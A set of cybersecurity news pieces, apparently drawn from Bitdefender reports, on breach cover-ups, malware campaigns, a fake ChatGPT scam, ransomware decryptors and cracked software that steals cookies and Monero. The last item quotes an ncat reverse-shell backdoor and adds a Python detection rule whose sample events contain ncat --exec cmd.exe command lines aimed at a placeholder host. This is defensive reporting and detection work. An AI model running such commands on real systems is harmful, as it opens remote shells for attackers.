
Organizations Struggle with Data Breach Disclosure

A recent survey conducted by cybersecurity firm Bitdefender highlights the ongoing struggle of organizations to handle data breaches and cybersecurity challenges. The survey revealed that a third of organizations have admitted to covering up data breaches, while 42% of IT leaders were instructed to maintain breach confidentiality. This trend of hiding data breaches is alarming as it puts customers' personal information at risk and undermines their trust in the organization.

The survey also highlighted the top cybersecurity concerns for businesses globally, with the most significant challenge being phishing attacks, followed by ransomware and zero-day exploits. These attacks are increasingly sophisticated and can cause significant financial and reputational damage to organizations.

According to Bogdan Botezatu, director of threat research and reporting at Bitdefender, "There is a significant gap between businesses' perceptions of their cybersecurity preparedness and the reality of their protection measures." The survey shows that while organizations are aware of the risks and the importance of cybersecurity, many are not taking sufficient measures to protect their systems and data.

It is essential for organizations to be transparent about data breaches and take necessary precautions to prevent them. They need to prioritize cybersecurity measures and invest in the latest technologies to protect their data from threats. As Botezatu emphasized, "By underestimating their exposure, businesses are not only putting themselves at risk but also their customers."

According to the poll, firms must act quickly to prevent cybersecurity problems and data breaches. In addition to ensuring that they have sufficient security measures in place, companies must be open about any security-related events. Only by implementing these measures can businesses keep the confidence of their customers and safeguard their data from online threats.



NullMixer Campaign: A Threat to Cybersecurity

A new cybersecurity threat has recently emerged in the form of the NullMixer campaign, which is causing concern among experts. The campaign has been found to distribute new polymorphic loaders, a type of malware that poses a significant threat to cybersecurity. This malware has already targeted thousands of endpoints in various countries, including France and Italy, and is constantly evolving to become more advanced and sophisticated.

Bitdefender, a leading cybersecurity company, has been monitoring the NullMixer campaign closely. They report that the malware has evolved over time, becoming more advanced and sophisticated. The new polymorphic loaders have shifted the focus of the malware to Italian and French endpoints, indicating a targeted attack. 

According to Bitdefender, the enhanced NullMixer malware is particularly dangerous because it is polymorphic, which means that it can change its form and structure to avoid detection. The malware can also mutate to evade traditional signature-based antivirus software. As a result, it is difficult to detect and eliminate, making it a significant threat to cybersecurity.

The NullMixer campaign is a reminder of the importance of staying vigilant when it comes to cybersecurity. As cyber threats become more advanced and sophisticated, it is crucial to have up-to-date security measures in place. This includes installing and regularly updating antivirus software, implementing strong passwords, and training employees on best practices for avoiding phishing attacks.

In light of the NullMixer campaign, cybersecurity experts are urging individuals and organizations to be cautious when opening email attachments or clicking on links. They advise that if something seems suspicious or out of the ordinary, it is best to err on the side of caution and avoid clicking on it.

As cybersecurity expert Michael Covington notes, "The best defense against these types of attacks is to stay informed and vigilant. It is essential to keep up with the latest threats and trends in cybersecurity and to take proactive measures to protect yourself and your organization."

The NullMixer campaign with its advanced polymorphic loaders highlights the importance of being proactive and vigilant about cybersecurity. It is crucial to stay informed about the latest threats and trends in cybersecurity and to take necessary measures to protect oneself and organizations from cyber attacks. By being vigilant and implementing robust security measures, individuals and organizations can reduce the risk of becoming a victim of cybercrime.

New Phishing Scam Targets Users With Fake ChatGPT Platform

The general population is fascinated with AI chatbots like OpenAI's ChatGPT. Sadly, the popularity of the AI tool has also attracted scammers who use it to carry out extremely complex investment frauds against naive internet users. Security experts also warn that ChatGPT and other AI techniques may be used to produce phishing emails and dangerous code rapidly and on a much wider scale.

Bitdefender Antispam Labs claims that the most recent wave of "AI-powered" scams starts with a straightforward unwanted email. In reality, our researchers were instantly drawn to what seemed to be a harmless marketing ploy, and they went on to uncover a complex fraud operation that poses a threat to participants' wallets and identities.

The initiative is currently focused on Denmark, Germany, Australia, Ireland, and the Netherlands.

How does the Scam Operate?

In the past several weeks, fake ChatGPT apps have appeared on the Google Play and Apple App Stores, promising users weekly or monthly memberships to utilize the service. The con artists behind this specific scheme go above and beyond to deceive customers.

Users who click the email's link are taken to a clone of ChatGPT that tempts them with money-making chances that pay up to $10,000 per month 'just on an exclusive ChatGPT platform.'

The recipient must click on an embedded link to access further information because the email itself is short on specifics. They click on this link to be taken to a bogus ChatGPT chatbot, where they are prompted to invest at least €250 and provide their contact information, including phone number, email address, and card details.

The victim is then given access to a copy of ChatGPT, which differs from the original chatbot in that it provides only a limited number of pre-written responses to user inquiries. This chatbot is accessible only through a domain that is blacklisted.

It's nothing unusual for scammers to take advantage of popular internet tools or patterns to trick users. Use only the official website to test out the official ChatGPT and its AI-powered text-generating capabilities. Avoid clicking on links you get in unsolicited mail, and be particularly suspicious of investment schemes distributed on behalf of a corporation, which generally are scams.

Free MortalKombat Ransomware Decryptor Released

An open-source universal decryptor for the newly discovered MortalKombat malware, which encrypts files, has been made available by the Romanian cybersecurity firm Bitdefender. The virus has been employed on dozens of victims in the United States, United Kingdom, Turkey, and the Philippines, as per a recent Cisco analysis.

MortalKombat distributors send emails with malicious ZIP attachments containing BAT loader scripts to random users. When the script is run, it downloads and runs the Laplas Clipper and ransomware binaries on the computer.

Although it has been identified since 2010, Xorist is disseminated as a ransomware constructor, enabling online threat actors to design and alter their own variant of the malware. The MortalKombat decryptor is a standalone executable that doesn't require installation on affected devices. The user may optionally choose a specific place holding backed-up encrypted data. It offers to scan the entire filesystem to find files infected by MortalKombat.

In addition, Bitdefender said that the malware has a clipboard-monitoring feature that specifically targets cryptocurrency users. The emails include references to expired cryptocurrency payments and attachments that resemble CoinPayments transaction numbers but conceal the malware payload. Once launched, the software downloads the ransomware, which encrypts all of a PC's data, including files in virtual machines and the recycle bin. It replaces the victim's desktop background with a Mortal Kombat 11 image, hence the name.

In a study by PCrisk, Cisco discovered a leaked version of the Xorist builder, where the builder interface options closely mirrored an actual Xorist ransomware building interface. The creator creates an executable ransomware file that the attackers can further modify. Notably, MortalKombat was used in recent attacks by an unidentified financially motivated malicious attacker as a part of a phishing operation targeted at multiple companies.

MegaCortex Ransomware Attack: Victims Can Now Restore Stolen Files For Free


Cybersecurity company, Bitdefender, has launched a new tool that would help victims of MegaCortex ransomware unlock their files, offering a sigh of relief to those whose files had been locked for years following the cyberattack.  

MegaCortex Ransomware

The MegaCortex ransomware first came to light in January 2019. It included many interesting characteristics, such as utilizing signed executables as a part of the payload, and the malware's developer was additionally offered security consulting services. 

The ransomware used both automated and manual components in order to attack as many targeted victims as possible. 

Moreover, MegaCortex ransomware may be employing networks that have already been infiltrated in an initial attack using Emotet and Qakbot malware to target businesses rather than individual consumers. 

According to The Malware Wiki, MegaCortex used AES encryption to encrypt user files. The only way to regain access to protected data is through a private key, which victims would need to buy from the hackers, according to a readme file that came with infections. 

The MegaCortex ransomware attack was capable of information theft and file encryption, as well as disabling usage capability. According to an estimate by TechCrunch, MegaCortex may have infected as many as 1,800 companies around the globe, including a number of “high profile” targets, although it has been indicated that the figure is likely to be far higher.

Later, in October 2021, law enforcement detained 12 people suspected of being involved in more than 1,800 ransomware assaults in 71 different nations. Police reportedly spent months searching through the data gathered during the arrests, according to TechCrunch. In the end, they discovered individual decryption keys that were utilised to produce and disseminate a program in September of last year to decode files encrypted by the LockerGoga ransomware.

Free Decryptor Built by Bitdefender 

The free decryptor is being deployed by Bitdefender and the EU’s initiative ‘No More Ransom’ in cooperation with the Zürich Cantonal Police, the Zürich Public Prosecutor’s Office, and Europol. 

The authorities announced in September that 12 culprits have been detained in connection with the Dharma, LockerGoga, and MegaCortex ransomware families. 

The arrests at the time, according to a statement from Zürich's prosecutor, enabled investigators to collect numerous private keys used by the ransomware gang, which would allow victims to restore data that had been previously encrypted using the LockerGoga or MegaCortex ransomware. A decryptor for LockerGoga was made available by Bitdefender last year.

The cybersecurity company has recently confirmed that the free MegaCortex decryptor is now being made available. The tool will work to unlock files that were encrypted by MegaCortex ransomware and all its variants. It is available to download from Bitdefender and through No More Ransom’s decryption tools portal, which is, in fact, home to 136 other free tools for 165 ransomware variants such as Babuk, DarkSide, Gandcrab, and REvil.  

A New Decryptor by Bitdefender for Victims of LockerGoga Ransomware

 

As part of its official announcement, Bitdefender said that it had released a free decryptor for the LockerGoga ransomware, allowing victims to recover encrypted files without paying any ransom.

The Romania-based cybersecurity firm Bitdefender released a universal LockerGoga decryptor. The company stated in its published announcement that the new decryptor is a joint effort involving Bitdefender, Europol, the NoMoreRansom project, the Zurich Public Prosecutor’s office, and the Zurich Cantonal Police.

The new decryptor by Bitdefender helps victims decrypt their files free of cost. It uses a path containing pairs of clean and encrypted files, and scans the entire filesystem or selected file folders. The decryptor provides a feature called “backup file”, which comes in handy in case of any problem during the decryption of the files.

LockerGoga is a program classified as ransomware. It came to notice in the 2019 cyber-attack against the U.S. and Norway-based companies, where the threat actors targeted high-profile organisations and individuals, including the world's greatest aluminum producer, Norsk Hydro, and the engineering firm Altran Technologies of France. They used it to encrypt the data stored on computers and blackmailed the users for ransom in exchange for decryption tools.
 
The National Cyber Security Centre (NCSC) reported that this computer infection was used in attacking over 1800 organizations all around the world. Cyberattacks involving various ransomware, one of them being LockerGoga, led to monetary damages of approximately 104 million US Dollars in 71 countries.
 
Around 12 of the attackers involved in the cyber-attack were arrested in October 2021 under an international law enforcement operation for spreading ransomware. In the wake of the arrest of its operator, LockerGoga was dismantled – which also led to the termination of all master private keys used in the encryption. As a result, those victims who did not pay the ransom to the threat actors were left with encrypted files waiting to recover them.
 

Cracked Versions of Some Software Steal Session Cookies and Monero Cryptocurrency

Bitdefender, a Romania-based cybersecurity organization located in Bucharest, has recently cautioned that cracked versions of Microsoft Office and Adobe Photoshop steal browser session cookies and Monero cryptocurrency from tightwads installing pirated apps.

As most readers would know, cracked software is a genuine application that has had its registration or licensing features removed. In the days of yore, cracked software (also known as warez) was mainly exchanged through BitTorrent and mostly attracted freeloaders who enjoyed using a specific suite without paying for the license.

These cracks, however, come at a different price: Bitdefender observed that some versions of both suites have been circulated with malware that captures browser session cookies (or, in Firefox, the complete user profile history). It hijacked Monero cryptocurrency deposits and exfiltrated certain information using BitTorrent, after first opening a backdoor and disabling the machine's firewall.


"Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a Tor proxy," said Bitdefender's Bogdan Botezatu, director of threat research and reporting, and Eduard Budaca the security researcher. They further added that "The tools work together to create a powerful backdoor that communicates through TOR with its command-and-control center: the ncat binary uses the listening port of the TOR proxy ('--proxy 127.0.0.1:9075') and uses the standard '--exec' parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior)." 
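A detection sketch for the backdoor command line described in the quote above, added here as an example (it is not Bitdefender's or this blog's code): it flags process-creation events in which a process is started with an exec option together with `--proxy` pointing at a loopback address. The event field names (`Image`, `CommandLine`), the sample events and the function names are constructed for illustration.

```python
import ipaddress
import shlex

# ncat options that hand the connection to a local program
EXEC_FLAGS = {"-e", "--exec", "-c", "--sh-exec"}

def _options(command_line):
    """Map each flag to its value; accepts '--flag value' and '--flag=value'."""
    tokens = [t.strip('"') for t in shlex.split(command_line, posix=False)]
    opts = {}
    for i, tok in enumerate(tokens):
        if not tok.startswith("-"):
            continue
        if "=" in tok:
            flag, value = tok.split("=", 1)
        else:
            flag, value = tok, tokens[i + 1] if i + 1 < len(tokens) else ""
        opts[flag] = value
    return opts

def _is_loopback(endpoint):
    """True for localhost / 127.0.0.0/8 / ::1, with or without a port."""
    for host in (endpoint, endpoint.rsplit(":", 1)[0]):
        host = host.strip("[]").lower()
        if host == "localhost":
            return True
        try:
            if ipaddress.ip_address(host).is_loopback:
                return True
        except ValueError:
            continue
    return False

def flag_proxy_backdoor(event):
    """Return a finding if the process pairs an exec flag with a loopback proxy."""
    opts = _options(event["CommandLine"])
    exec_flag = next((f for f in opts if f in EXEC_FLAGS), None)
    proxy = opts.get("--proxy")
    if exec_flag and proxy and _is_loopback(proxy):
        return {"image": event["Image"], "proxy": proxy, "exec": opts[exec_flag]}
    return None

def scan(events):
    return [hit for hit in map(flag_proxy_backdoor, events) if hit]

# Constructed sample events (not taken from any real incident)
EVENTS = [
    {"Image": r"C:\Users\Public\ncat.exe",
     "CommandLine": r"ncat.exe placeholder.invalid 443 --proxy 127.0.0.1:9075 --exec cmd.exe"},
    {"Image": r"C:\ProgramData\svc_update.exe",  # renamed copy, still caught by its arguments
     "CommandLine": r"svc_update.exe --proxy=127.0.0.1:9075 -e cmd.exe placeholder.invalid 443"},
    {"Image": r"C:\Tools\ncat.exe",  # ordinary use through a non-loopback proxy, no exec
     "CommandLine": r"ncat.exe --proxy 10.0.0.8:3128 intranet.example 443"},
]
```

Because the rule keys on arguments rather than the file name, unrelated tools that reuse these flag names can also match; treat hits as triage leads and confirm with parent-process and network context.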


Reportedly, operators take a while to analyze what they have compromised and determine whether or not they should rob it, depending upon the estimated value they could gain out of it.

In the days before software as a service in the cloud became a feasible business model, vendors were fully dependent on physical media containing the whole program for delivery to end-users. Copy protections were immediate and common targets for crackers, which resulted in unlawful copies of otherwise fully functioning software being sold at a much lower cost.

“Pirated software is never the way to go, however tempting it may be, as the risks tend to always outweigh the benefits,” sources further noted.